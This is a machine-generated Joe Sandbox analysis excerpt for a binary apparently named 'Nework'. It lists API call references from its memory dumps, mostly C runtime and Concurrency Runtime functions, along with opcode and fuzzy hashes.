                                                                            • Opcode ID: e0181241b5b8019612f8ca8d979f233d7c1d81399754ddeb18c35af3804e5508
                                                                            • Instruction ID: 17d2f70c967ad6285ba638cb30caf8d61a3b27876b5cf58d6865e26dc12ea12a
                                                                            • Opcode Fuzzy Hash: e0181241b5b8019612f8ca8d979f233d7c1d81399754ddeb18c35af3804e5508
                                                                            • Instruction Fuzzy Hash: 93B09232A03874478B966B94BC885AD77559B85AA130B0156DA01AB624CB501CC28BD5
                                                                            APIs
                                                                            • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 001C2540
                                                                              • Part of subcall function 001C233E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C2361
                                                                            • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 001C2561
                                                                            • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 001C256E
                                                                            • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 001C25BC
                                                                            • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 001C2643
                                                                            • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 001C2656
                                                                            • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 001C26A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                            • String ID:
                                                                            • API String ID: 2530155754-0
                                                                            • Opcode ID: 3b87af610c14883dc56f24ee5bb99e071151e3733b46b5c294daca249561b337
                                                                            • Instruction ID: 1099f52855b4b5745ff7d36f8c30364ea80980b13eafcd3d783b545fedbb8168
                                                                            • Opcode Fuzzy Hash: 3b87af610c14883dc56f24ee5bb99e071151e3733b46b5c294daca249561b337
                                                                            • Instruction Fuzzy Hash: 3C815734900249ABDF169FA4C995FEE7BB2AF76304F04009CEC416B292C776CD66DB61
                                                                            APIs
                                                                            • ListArray.LIBCONCRT ref: 001B4398
                                                                              • Part of subcall function 001B4179: RtlInitializeSListHead.NTDLL(?), ref: 001B4245
                                                                              • Part of subcall function 001B4179: RtlInitializeSListHead.NTDLL(?), ref: 001B424F
                                                                            • ListArray.LIBCONCRT ref: 001B43CC
                                                                            • Hash.LIBCMT ref: 001B4435
                                                                            • Hash.LIBCMT ref: 001B4445
                                                                            • RtlInitializeSListHead.NTDLL(?), ref: 001B44DA
                                                                            • RtlInitializeSListHead.NTDLL(?), ref: 001B44E7
                                                                            • RtlInitializeSListHead.NTDLL(?), ref: 001B44F4
                                                                            • RtlInitializeSListHead.NTDLL(?), ref: 001B4501
                                                                              • Part of subcall function 001B9AA1: std::bad_exception::bad_exception.LIBCMT ref: 001B9AC3
                                                                            • RegisterWaitForSingleObject.KERNEL32(?,00000000,001B7875,?,000000FF,00000000), ref: 001B4589
                                                                            • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 001B45AB
                                                                            • GetLastError.KERNEL32(001B52EB,?,?,00000000,?,?), ref: 001B45BD
                                                                            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 001B45DA
                                                                              • Part of subcall function 001AFA0A: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,001B52EB,00000008,?,001B45DF,?,00000000,001B7866,?,7FFFFFFF,7FFFFFFF,00000000), ref: 001AFA22
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001B4604
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
                                                                            • String ID:
                                                                            • API String ID: 2750799244-0
                                                                            • Opcode ID: b15f579eef589e984089adb0d21d395fd9b09c13b9bbfae7d4773053f062627e
                                                                            • Instruction ID: acdb124546eee6adc9d9a6190b68f2838fe420b1c78c5d1dc0b622bd8cc707aa
                                                                            • Opcode Fuzzy Hash: b15f579eef589e984089adb0d21d395fd9b09c13b9bbfae7d4773053f062627e
                                                                            • Instruction Fuzzy Hash: B8816DB0A11A56FBD718DF78C885BD9FBA8BF19700F00421AF528D7281CBB4A564CBD0
                                                                            APIs
                                                                            • Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 001B26A1
                                                                              • Part of subcall function 001B398C: GetVersionExW.KERNEL32(?), ref: 001B39B0
                                                                              • Part of subcall function 001B398C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 001B3A4F
                                                                            • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 001B26B5
                                                                            • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 001B26D6
                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 001B273F
                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 001B2773
                                                                              • Part of subcall function 001B064D: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 001B066D
                                                                            • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 001B27F3
                                                                              • Part of subcall function 001B21BC: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 001B21D0
                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 001B283B
                                                                              • Part of subcall function 001B0622: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 001B063E
                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 001B284F
                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 001B2860
                                                                            • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 001B28AD
                                                                            • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 001B28D2
                                                                            • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 001B28DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
                                                                            • String ID:
                                                                            • API String ID: 4140532746-0
                                                                            • Opcode ID: bd11cde1c4786190447221f311736851847c8ad91df35feaaee2a1a90394dd0b
                                                                            • Instruction ID: 8a7724ad452d71785a2ddec08daa45008d7fc27720ca5a0fbff58ba3edd235ce
                                                                            • Opcode Fuzzy Hash: bd11cde1c4786190447221f311736851847c8ad91df35feaaee2a1a90394dd0b
                                                                            • Instruction Fuzzy Hash: D181EF31A006169FCB18DFA9D8E05FEBBF2FB68300B65412DD545E7A50DB309D99CB84
                                                                            APIs
                                                                            • ___free_lconv_mon.LIBCMT ref: 001CF193
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CED49
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CED5B
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CED6D
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CED7F
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CED91
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDA3
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDB5
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDC7
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDD9
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDEB
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDFD
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEE0F
                                                                              • Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEE21
                                                                            • _free.LIBCMT ref: 001CF188
                                                                              • Part of subcall function 001CABE5: HeapFree.KERNEL32(00000000,00000000,?,001CEEBD,?,00000000,?,?,?,001CEEE4,?,00000007,?,?,001CF2E6,?), ref: 001CABFB
                                                                              • Part of subcall function 001CABE5: GetLastError.KERNEL32(?,?,001CEEBD,?,00000000,?,?,?,001CEEE4,?,00000007,?,?,001CF2E6,?,?), ref: 001CAC0D
                                                                            • _free.LIBCMT ref: 001CF1AA
                                                                            • _free.LIBCMT ref: 001CF1BF
                                                                            • _free.LIBCMT ref: 001CF1CA
                                                                            • _free.LIBCMT ref: 001CF1EC
                                                                            • _free.LIBCMT ref: 001CF1FF
                                                                            • _free.LIBCMT ref: 001CF20D
                                                                            • _free.LIBCMT ref: 001CF218
                                                                            • _free.LIBCMT ref: 001CF250
                                                                            • _free.LIBCMT ref: 001CF257
                                                                            • _free.LIBCMT ref: 001CF274
                                                                            • _free.LIBCMT ref: 001CF28C
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                            • String ID:
                                                                            • API String ID: 161543041-0
                                                                            • Opcode ID: dacdcd9b5e378f0e6b87874dd8c0962c46a20f4bd77032aa6b81fbbabc4e1ecc
                                                                            • Instruction ID: 408789f3e287dc63586a5fd4a8429d214d610820216ffbbd327bf7061e624a7d
                                                                            • Opcode Fuzzy Hash: dacdcd9b5e378f0e6b87874dd8c0962c46a20f4bd77032aa6b81fbbabc4e1ecc
                                                                            • Instruction Fuzzy Hash: DE317A32604208DFEB26AA78D945F5AB3EAAF30320F54452DE549D7191DF30FC81CB11
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,001B3A46), ref: 001AF8DF
                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 001AF8ED
                                                                            • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 001AF8FB
                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 001AF929
                                                                            • GetLastError.KERNEL32(?,?,?,001B3A46), ref: 001AF944
                                                                            • GetLastError.KERNEL32(?,?,?,001B3A46), ref: 001AF950
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001AF966
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                                                                            • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                            • API String ID: 1654681794-465693683
                                                                            • Opcode ID: f9fb4495c4aa91a0d0aef47ad2f9af3ddb1507a6d3abffaac195f9e91422c61c
                                                                            • Instruction ID: 9ff0095eb6aaf6963c22f1af7d93f47a07d7a826759bccaa1bc313a9b52923dc
                                                                            • Opcode Fuzzy Hash: f9fb4495c4aa91a0d0aef47ad2f9af3ddb1507a6d3abffaac195f9e91422c61c
                                                                            • Instruction Fuzzy Hash: 2E01A179900751BAD7117BF5AC8AF7F37ACAF09755704043AF502D6562EBB4C8818760
                                                                            APIs
                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 001C5200
                                                                            • type_info::operator==.LIBVCRUNTIME ref: 001C5227
                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 001C5333
                                                                            • CatchIt.LIBVCRUNTIME ref: 001C5388
                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 001C540E
                                                                            • _UnwindNestedFrames.LIBCMT ref: 001C5495
                                                                            • CallUnexpected.LIBVCRUNTIME ref: 001C54B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                            • String ID: csm$csm$csm
                                                                            • API String ID: 4234981820-393685449
                                                                            • Opcode ID: fc0a2e1d5a593b9155d86076cbc9ce4ac485ad2e54972cb95c1d18bfe5fd176b
                                                                            • Instruction ID: e1eed80cd72ff0ba8bb923223af4b05543086c47e5a4d138124075528ce4b4fa
                                                                            • Opcode Fuzzy Hash: fc0a2e1d5a593b9155d86076cbc9ce4ac485ad2e54972cb95c1d18bfe5fd176b
                                                                            • Instruction Fuzzy Hash: FFC15B71800A09DFCF19DFA4C881EAEBBB6BF34315F14415EE8156B212E771EA91CB91
                                                                            APIs
                                                                            • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 001C27DF
                                                                              • Part of subcall function 001C233E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C2361
                                                                            • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 001C2800
                                                                            • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 001C280D
                                                                            • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 001C285B
                                                                            • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 001C2903
                                                                            • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 001C2935
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                            • String ID:
                                                                            • API String ID: 1256429809-0
                                                                            • Opcode ID: c978d21f51ea3cc1c09a8d207faa80bac600fd2050c97006fb6be3f6607adb9d
                                                                            • Instruction ID: 3b1ce146cd1fdf510e606f1a71020e521d313d498f6aa384fd84f2000560da5d
                                                                            • Opcode Fuzzy Hash: c978d21f51ea3cc1c09a8d207faa80bac600fd2050c97006fb6be3f6607adb9d
                                                                            • Instruction Fuzzy Hash: 03718730900259ABDF19CF94C981FBEBBB6AF65308F04409DEC41AB292C772DD16DB61
                                                                            APIs
                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BE8D9
                                                                              • Part of subcall function 001B8D8F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B8DB0
                                                                            • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 001BE8F2
                                                                            • Concurrency::location::_Assign.LIBCMT ref: 001BE908
                                                                            • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 001BE975
                                                                            • Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 001BE97D
                                                                            • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 001BE9A4
                                                                            • Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 001BE9B0
                                                                            • Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 001BE9E8
                                                                            • Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 001BEA07
                                                                            • Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 001BEA15
                                                                            • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 001BEA3C
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Base::$ContextVirtual$Processor::QuickScheduler$ClearCountedEventIdleInterlockedProcessorReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSlotSpinTasksThrowTraceUntilVisible
                                                                            • String ID:
                                                                            • API String ID: 3608406545-0
                                                                            • Opcode ID: 7170bce21199764a4a72120c48731c071d5e87052b2bf77b7b6bca8f47027d3c
                                                                            • Instruction ID: c0677ac5a32aaa20a0a4aa4aa5b4b40cf5c95b5192c3c8c07e32155db05ff52f
                                                                            • Opcode Fuzzy Hash: 7170bce21199764a4a72120c48731c071d5e87052b2bf77b7b6bca8f47027d3c
                                                                            • Instruction Fuzzy Hash: F4518D307002048FDB05EF64C4D6BED77A6AF99314F1940A9ED4A9F386CB70AD458BA2
                                                                            APIs
                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 001B687F
                                                                            • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 001B68B1
                                                                            • List.LIBCONCRT ref: 001B68EC
                                                                            • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 001B68FD
                                                                            • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 001B6919
                                                                            • List.LIBCONCRT ref: 001B6954
                                                                            • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 001B6965
                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001B6980
                                                                            • List.LIBCONCRT ref: 001B69BB
                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 001B69C8
                                                                              • Part of subcall function 001B5D3F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001B5D57
                                                                              • Part of subcall function 001B5D3F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001B5D69
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                            • String ID:
                                                                            • API String ID: 3403738998-0
                                                                            • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                                                                            • Instruction ID: 714e70e89da75fb92dc04f0781964fcb316c0f8319f8b4382d02061f3e8abffc
                                                                            • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                                                                            • Instruction Fuzzy Hash: FE515E75A00209AFDF08DF64C495BEDB7B9BF28304F4440A9E955AB282DB34AE05CB90
                                                                            APIs
                                                                            • _free.LIBCMT ref: 001CA35F
                                                                              • Part of subcall function 001CABE5: HeapFree.KERNEL32(00000000,00000000,?,001CEEBD,?,00000000,?,?,?,001CEEE4,?,00000007,?,?,001CF2E6,?), ref: 001CABFB
                                                                              • Part of subcall function 001CABE5: GetLastError.KERNEL32(?,?,001CEEBD,?,00000000,?,?,?,001CEEE4,?,00000007,?,?,001CF2E6,?,?), ref: 001CAC0D
                                                                            • _free.LIBCMT ref: 001CA36B
                                                                            • _free.LIBCMT ref: 001CA376
                                                                            • _free.LIBCMT ref: 001CA381
                                                                            • _free.LIBCMT ref: 001CA38C
                                                                            • _free.LIBCMT ref: 001CA397
                                                                            • _free.LIBCMT ref: 001CA3A2
                                                                            • _free.LIBCMT ref: 001CA3AD
                                                                            • _free.LIBCMT ref: 001CA3B8
                                                                            • _free.LIBCMT ref: 001CA3C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 7320d7865bb8e4aec17035820f420de6ab55ee019383c35e4ab3ec7ebca1e402
                                                                            • Instruction ID: f053856e452f87eb7ac4dae517bd4f2a2f089f5d8c3b8f603fe5360c93070c93
                                                                            • Opcode Fuzzy Hash: 7320d7865bb8e4aec17035820f420de6ab55ee019383c35e4ab3ec7ebca1e402
                                                                            • Instruction Fuzzy Hash: 7521AB7A90410CBFCB42EF94C985EDD7BB9BF28344F404169F6159B121DB31DA44CB81
                                                                            APIs
                                                                            • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 001B7210
                                                                            • SwitchToThread.KERNEL32(?), ref: 001B7233
                                                                            • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 001B7252
                                                                            • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 001B726E
